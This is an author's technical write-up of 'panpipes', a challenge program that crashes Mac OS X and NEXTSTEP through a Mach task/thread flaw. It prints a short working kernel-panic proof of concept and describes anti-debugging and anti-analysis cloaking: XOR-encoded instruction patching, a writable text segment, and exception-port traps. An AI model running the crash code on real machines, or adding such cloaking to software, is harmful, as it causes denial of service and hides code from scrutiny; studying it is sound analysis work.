The Construction of Panpipes

The Mac OS X Expert Challenge 2005.1


© Amit Singh. All Rights Reserved. Written in April 2005

As a program, panpipes has two primary goals: it triggers a kernel panic, and it attempts to hide its working through a set of "cloaking" measures. I created panpipes by haphazardly cutting, pasting, and modifying code from various programming examples in my forthcoming book. It is not a "pretty" program: neither visually nor semantically.

Panic Triggering

Perhaps the most intriguing aspect of the system flaw used by panpipes to trigger a kernel panic is the flaw's age. It has existed for well over ten years. NEXTSTEP, which is ancestral to Mac OS X, had the same issue, and the issue continues to exist in the current and upcoming versions of Mac OS X.

Contrary to popular belief, Mac OS X is not "powered by Unix". It supports Unix-like APIs and behavior through additional layers on top of a core system. Consider the relevant example of the process subsystem in Mac OS X. The runnable entity in the Mac OS X kernel is a Mach thread, which is further separated into a shuttle and an activation. Threads are contained in Mach tasks. BSD-style process abstraction is retrofitted by associating a process structure with each Mach task, among other things.

In Unix, the only way to create a new process is through the fork system call (or variant). In Mac OS X, tasks and threads are created and manipulated using Mach calls. Now, user programs typically do not deal with Mach tasks or threads directly. The Pthreads package in the system library creates Mach threads, but no user-space code typically creates Mach tasks. The BSD-style fork implementation in the kernel uses these Mach calls to create a task and a thread within that task. Additionally, it allocates and initializes a process structure that is associated with the task. From the standpoint of the caller of fork, all these operations occur atomically, with the Mach and BSD-style data structures remaining in sync. The problem is that Mach and BSD-style portions of the kernel do not remain in sync under certain user-exploitable circumstances.

Figure 1 shows the core idea behind panpipes. The program should compile and run on NEXTSTEP 3.x, causing a kernel panic; the version for Mac OS X 10.x is slightly different. It creates a Mach task and a Mach thread within that task, and attempts to resume the thread. This panics the system. Thus, the flaw is conceptually very simple: the sequence of calls made by panpipes creates a runnable thread in a task with no process structure. As soon as some code, typically in the Unix portions of the kernel, attempts to access the process structure, you get a kernel panic.

 
/*
 * Tested on NEXTSTEP 3.3
 */

#include <stdlib.h>             /* exit() */
#include <mach/mach.h>
#include <mach/message.h>

int
main(void)
{
    task_t child_task;
    thread_t a_thread;

    /* no error checking */

    (void)task_create(task_self(), TRUE, &child_task);
    (void)thread_create(child_task, &a_thread);

    /* no need to even thread_set_state(), etc. */

    (void)thread_resume(a_thread);
    /* panic */

    /*WILLNOTBEREACHED*/
    exit(0);
}

Figure 1. Panpipes in its simplest form (NEXTSTEP version)

Cloaking Measures

If panpipes were as simple as the program shown in Figure 1, it would be trivially easy to determine the cause of the panic it triggers. Since this was to be a challenge for the experts, I wished to increase the difficulty of analyzing panpipes both dynamically and statically. With this goal, I added certain cloaking measures to panpipes, as discussed below. As we will see later, some of these measures would prove to be inconsequential because a given analysis approach will not trigger them.

Simplest cloaking measures

As a trivial measure, the panpipes executable is stripped of all symbols that are not needed for it to load and run correctly. Now, even a stripped dynamically linked executable generated from a program with no high-level language code will contain several symbols, as shown in Figure 2. These symbols are from the language runtime code in the executable.

$ cat empty.c
main() {}
$ gcc -o empty empty.c
$ strip empty
$ nm empty
00003000 D _NXArgc
00003004 D _NXArgv
         U ___keymgr_dwarf2_register_sections
         U ___keymgr_global
0000300c D ___progname
         U __cthread_init_routine
         U __dyld_register_func_for_add_image
         U __dyld_register_func_for_remove_image
         U __init_keymgr
         U __keymgr_get_and_lock_processwide_ptr
         U __keymgr_set_and_unlock_processwide_ptr
...
0000309c S _do_seqnos_mach_notify_send_once
00003008 D _environ
         U _errno
         U _exit
         U _free
         U _mach_init_routine
000030a0 S _receive_samples


Figure 2. Symbols in an empty program's Mach-O executable

The panpipes executable contains the symbols that are shown in Figure 2, and a few additional symbols that are shown in Figure 3.

         U _IOIteratorNext
         U _IOObjectRelease
         U _IORegistryCreateIterator
...
         U _fork
...
         U _kIOMasterPortDefault
...
         U _memcpy
         U _pthread_create
         U _pthread_detach
...


Figure 3. Additional symbols in the panpipes executable

All symbols shown in Figure 3 except the last three are there for distraction. The four I/O Kit symbols constitute the I/O Kit red herring described later. The fork is there to potentially distract somebody monitoring system call invocations: since Mach-level task creation is normally the result of a fork, I added a spurious fork invocation. Note that the kernel will still see an inconsistent number of process-related function invocations, so this is not a particularly useful cloaking measure. The memcpy is a side effect of my using some MIG-generated routines directly. Finally, pthread_create and pthread_detach are used by panpipes to set up an exception handler (see "Disabling debugging").

Disabling debugging

Panpipes "disables" debugging in two steps. As an immediate measure, it sets its task's exception port to a nonsensical port. Any code before this step is still debuggable, and debugging any code after this step causes the program to "hang" in user space. In the second step, panpipes establishes a full-fledged exception handler that waits for exceptions to arrive. However, as part of its exception processing, the handler itself triggers the panic. Once the handler thread is active, panpipes changes the task's exception port from its existing nonsensical value to the port it allocated for the handler.

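Thus, from a debugging standpoint, panpipes has three types of code: code that runs before the first step and can be debugged normally, code that runs between the two steps and hangs the program if debugged, and code that runs after the handler is installed and panics the system if debugged.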

PT_DENY_ATTACH or not?

I considered adding a call to ptrace with a PT_DENY_ATTACH request. This request causes the calling process to exit unceremoniously with an ENOTSUP error if it is run under a debugger (that is, if the P_TRACED flag is set in the proc structure). I decided against it, however, assuming that the consequential error message in the debugger would be tell-tale to experts. Besides, this measure is easily circumvented in several ways. An example of an Apple program using PT_DENY_ATTACH is iTunes, as shown in Figure 4.

$ gdb /Applications/iTunes.app/Contents/MacOS/iTunes
...
Reading symbols for shared libraries ............... done
(gdb) run
Starting program: /Applications/iTunes.app/Contents/MacOS/iTunes
...
Program exited with code 055.
(gdb)


Figure 4. The Use of PT_DENY_ATTACH in iTunes
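For reference, the request itself is a single call. The sketch below is not taken from panpipes, which does not make the call in the clear. The wrapper name deny_debugger_attach is hypothetical, and the #ifdef guard is an assumption added so that the fragment also compiles on systems that lack PT_DENY_ATTACH.

```c
#include <sys/types.h>
#include <sys/ptrace.h>

/*
 * Ask the kernel to refuse debugger attachment for this process.
 * Returns the result of ptrace() where PT_DENY_ATTACH exists, or -1
 * on platforms that do not define the request (it is specific to
 * Mac OS X). The function name is illustrative only.
 */
int deny_debugger_attach(void)
{
#ifdef PT_DENY_ATTACH
    /* pid, addr, and data are unused for this request. */
    return ptrace(PT_DENY_ATTACH, 0, 0, 0);
#else
    return -1;
#endif
}
```

The exit code 055 that gdb reports in Figure 4 is octal. It is 45 in decimal, which is the value of ENOTSUP on Mac OS X.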

An "encrypted" system call stub for ptrace can still be found within panpipes.

Hiding use of Mach routines

For obvious reasons, I did not wish to have the tell-tale Mach functions used for disabling debugging show up as dynamically resolved symbols in the program. An extremely crude approach would be to either statically link in the entire system library, or at least extract the needed functions from the system library and use the object code. I might have done the latter, if it were not too much grunt work.

Breaking down the problem into parts led to a solution that not only required less work, but was a better solution too. I considered that the program would need to use Mach traps and MIG-generated routines, with the MIG-generated routines themselves resorting to Mach traps eventually. Therefore, I simply grep'ed the necessary MIG routine specifications from the appropriate files to create my own MIG specification files. I used the skip statement to account for the routines I did not need and thus did not include. This gave me my Mach functions without enormously bloating the program. However, I still needed to do something about the Mach traps that would be used by the MIG-generated routines.

Hiding use of Mach traps

Apple does not support static linking for user-space programs. Thus, normal programs always go through dynamic libraries. In particular, besides a few direct invocations of the PowerPC system call (sc) instruction courtesy of the language runtime, a normal program does not include any sc instructions. Calling Mach traps directly would cause sc instructions to appear in panpipes, thus ringing giant alarm bells during a static analysis.

I decided to use simple-minded dynamic instruction patching to hide my use of Mach traps. All traps used by panpipes initially exist as random assembly code in the object file, as shown in Figure 5. Note that the instructions are utterly nonsensical at this point.

    .text
    .align 2
    .globl _stub_mach_reply_port
_stub_mach_reply_port:
    mflr r0
    stmw r30,-8(r1)
    stw r0,8(r1)
    stwu r1,-80(r1)
...
    .align 2
    .globl _stub_mach_msg_trap
_stub_mach_msg_trap:
    lwz r0,104(r30)
    mullw r2,r2,r0
    stw r2,56(r30)
    li r0,1
    .align 2
    .globl _stub_mach_msg_overwrite_trap
_stub_mach_msg_overwrite_trap:
    stw r0,56(r30)
    mr r3,r0
    lwz r1,0(r1)
    lwz r0,8(r1)
...


Figure 5. Implementing stubs for Mach traps

Panpipes replaces the useless instructions in the trap stubs with useful instructions at runtime. However, it does not store the corresponding instruction payload as is in a data section: it uses "encryption" (merely an exclusive OR operation) to attempt to foil a somewhat more determined static analysis.

 
#define I_BLR           0x4e800020
#define I_NOP           0x60000000
#define I_SC            0x44000002

#define ABCDABCD        0x7ffefb78
#define BADDBADD        0x397e0040
#define BADDCAFE        0x9421ffb0
#define CAFEBABE        0x80210000
#define CAFECAFE        0x7c0803a6
#define DEADBEEF        0xbbc1fff8
#define F00FF00F        0x7c200b78
#define FEEDF00D        0x917e0020
#define FEEDFACE        0x38600000

typedef struct {
    u_int32_t pos;
    u_int32_t enc;
    u_int32_t key;
} e_instruction_t;

e_instruction_t
CODE_mach_reply_port[] = {
    { 1, (I_SC ^ F00FF00F),       F00FF00F },
    { 0, (0x3800ffe6 ^ CAFEBABE), CAFEBABE },
    { 3, (I_NOP ^ FEEDF00D),      FEEDF00D },
    { 2, (I_BLR ^ CAFECAFE),      CAFECAFE },
};

...

Figure 6. Dynamic instruction patching

Note in Figure 5 that each stub has a fixed size of four instructions. As shown in Figure 6, a CODE_trap_name array contains instruction-generating formulas for the trap trap_name. Each formula is a structure of type e_instruction_t whose fields have the following meaning: the final instruction at position pos within the stub is the exclusive OR of enc with key. The entries need not appear in position order. While this sounds cumbersome to debug, it will not be a stumbling block as long as you realize that you do not need to decipher the "encryption" at all. If you set a breakpoint within an appropriate range of addresses in the code, instruction "decryption" will already have completed, and the actual instructions will be in memory, where they can be easily examined with a debugger. A related simplifying factor is that all stubs are adjacent in memory, so if you get one, you are likely to get them all.
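The decoding rule just described can be sketched in portable C. This is a minimal illustration rather than the code panpipes contains: the function name decode_stub, the STUB_WORDS constant, and the use of a plain output buffer instead of the stub's own text are assumptions made here. The table values are those of Figure 6, with the key constants written out as literals.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STUB_WORDS 4            /* each stub is four instructions long */

/* Same layout as e_instruction_t in Figure 6. */
typedef struct {
    uint32_t pos;               /* index of the instruction in the stub */
    uint32_t enc;               /* instruction XORed with key */
    uint32_t key;               /* XOR key */
} e_instruction_t;

#define I_BLR 0x4e800020u
#define I_NOP 0x60000000u
#define I_SC  0x44000002u

/* The CODE_mach_reply_port table from Figure 6. */
const e_instruction_t code_mach_reply_port[STUB_WORDS] = {
    { 1, I_SC        ^ 0x7c200b78u, 0x7c200b78u },
    { 0, 0x3800ffe6u ^ 0x80210000u, 0x80210000u },
    { 3, I_NOP       ^ 0x917e0020u, 0x917e0020u },
    { 2, I_BLR       ^ 0x7c0803a6u, 0x7c0803a6u },
};

/* Recover each instruction and store it at its position in out[]. */
void decode_stub(const e_instruction_t *table, size_t n, uint32_t *out)
{
    for (size_t i = 0; i < n; i++) {
        assert(table[i].pos < STUB_WORDS);
        out[table[i].pos] = table[i].enc ^ table[i].key;
    }
}
```

Calling decode_stub(code_mach_reply_port, STUB_WORDS, out) fills out with 0x3800ffe6, 0x44000002, 0x4e800020, and 0x60000000, which disassemble as li r0,-26, sc, blr, and nop.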

A few other steps are required in this cloaking measure, but they exist to make dynamic instruction patching itself work rather than to thwart analysis.

First, the __TEXT segment in a Mach-O executable is marked as read-only: it has an initprot value of 5 (VM_PROT_READ|VM_PROT_EXECUTE), and a maxprot value of 7 (VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE). Rather than complicating panpipes further by adding calls to dynamically change memory protection values, I simply edited the panpipes binary manually after compilation to change the initprot value to 7. Thus, dyld loads panpipes with a writable __TEXT segment. The resulting abnormality is observable via the otool command.

Second, panpipes patches instructions "correctly" in that it uses the necessary set of dcbf, sync, icbi, and isync instructions. These instructions are plainly visible in panpipes, and I expected this to be an important hint.
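The reason for that instruction sequence is that newly written instruction words must be pushed out of the data cache and stale copies dropped from the instruction cache before they are executed. GCC and Clang expose this operation as the __builtin___clear_cache builtin, which on PowerPC is expected to perform an equivalent sequence. The sketch below uses that builtin in place of the hand-written instructions found in panpipes. The helper name patch_words is hypothetical, and the destination is assumed to be writable memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Copy n instruction words over dst, then synchronize the data and
 * instruction caches for the patched range.
 * Assumes dst is writable; patch_words is an illustrative name.
 */
void patch_words(uint32_t *dst, const uint32_t *src, size_t n)
{
    assert(dst != NULL && src != NULL);

    for (size_t i = 0; i < n; i++)
        dst[i] = src[i];

    /* Compiler builtin standing in for dcbf/sync/icbi/isync. */
    __builtin___clear_cache((char *)dst, (char *)(dst + n));
}
```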

Removing symbols for MIG support functions

My explicit use of MIG-generated client code resulted in panpipes requiring the mig_put_reply_port, mig_dealloc_reply_port, and mig_get_reply_port functions. These functions are not called directly by programs, and thus it was desirable to hide their use. If they showed up in the output of nm, for example, it would be a clear indication that panpipes may be calling low-level Mach functions. The first two functions can have dummy (empty) implementations without affecting panpipes' panic induction. mig_get_reply_port can be a trivial wrapper around the mach_reply_port Mach trap, although its normal implementation is more complicated.

 
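/* Dummy: panic induction does not depend on returning the port. */
void
mig_put_reply_port(mach_port_t reply_port)
{
}

/* Dummy: the reply port is never deallocated. */
void
mig_dealloc_reply_port(mach_port_t reply_port)
{
}

/* Trivial wrapper around the patched mach_reply_port trap stub. */
mach_port_t
mig_get_reply_port(void)
{
    return stub_mach_reply_port();
}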

Figure 7. Implementing MIG support functions

Pre-main setup

Panpipes uses a pre-main constructor function implemented using the constructor attribute that is supported by GCC. The constructor performs the actions shown in Figure 8. Constructor functions are automatically called just before main starts executing. In a Mach-O object file, constructor functions live in a section called __mod_init_func. The complete "path" to this section is LC_SEGMENT.__DATA.__mod_init_func.

 
void constructor(void) __attribute__ ((constructor));

void
constructor(void)
{
    // 1. Set up stubs for ptrace(), mach_task_self(),
    // mach_reply_port(), and mach_msg_trap().

    /* Until this point, you can debug normally. */

    // 2. Set the task's kernel port as its exception port

    /* Here onwards, debugging will hang the program. */

    // 3. Set up stubs for mach_msg_overwrite_trap(),
    // mach_thread_self(), and exit().

    // 4. Allocate a new port to be used as the task's exception
    // port, insert the appropriate rights, create a pthread to
    // run the exception handler, detach it, and set the new
    // port as the task's exception port.

    /* Here onwards, debugging will cause a panic. */

    // Now main() can run
}
...

Figure 8. Pre-main setup

The presence and locations of such constructor functions can be determined in multiple ways, both statically and dynamically. For example, you can use otool to display the relevant details.
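The pre-main mechanism itself is easy to demonstrate in isolation. The following is a minimal sketch, assuming GCC or a compatible compiler; the names pre_main_setup, setup_done, and setup_has_run are hypothetical and do not appear in panpipes.

```c
/* Set by the constructor, read later by ordinary code. */
static int setup_done = 0;

/* Functions carrying this attribute run before main() is entered. */
static void pre_main_setup(void) __attribute__ ((constructor));

static void
pre_main_setup(void)
{
    setup_done = 1;
}

/* Report whether the constructor has already run. */
int
setup_has_run(void)
{
    return setup_done;
}
```

By the time main begins executing, setup_has_run returns 1 even though nothing in main called pre_main_setup.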

The I/O Kit red herring

I had mistakenly pasted a selection containing some I/O Kit code into my program, and decided to let it stay as a potential distracter. As shown in Figure 9, I modified the code to be nonsensical, and it is never even called (the kernel panics before thread_exit can execute). However, its "benefits" include:

Even though it is a naïve measure, the I/O Kit red herring proved to be effective, leading many to believe that panpipes is "messing with a device".

 
#include <IOKit/IOKitLib.h>

void
thread_exit(void)
{
    IORegistryCreateIterator(kIOMasterPortDefault,
                             kIOServicePlane,
                             kIORegistryIterateRecursively,
                             stub_mach_task_self());

    while (IOIteratorNext(stub_mach_task_self())) {
        IOObjectRelease(stub_mach_task_self());
    }

    exit(0);
}

Figure 9. The I/O Kit Red Herring


Amit Singh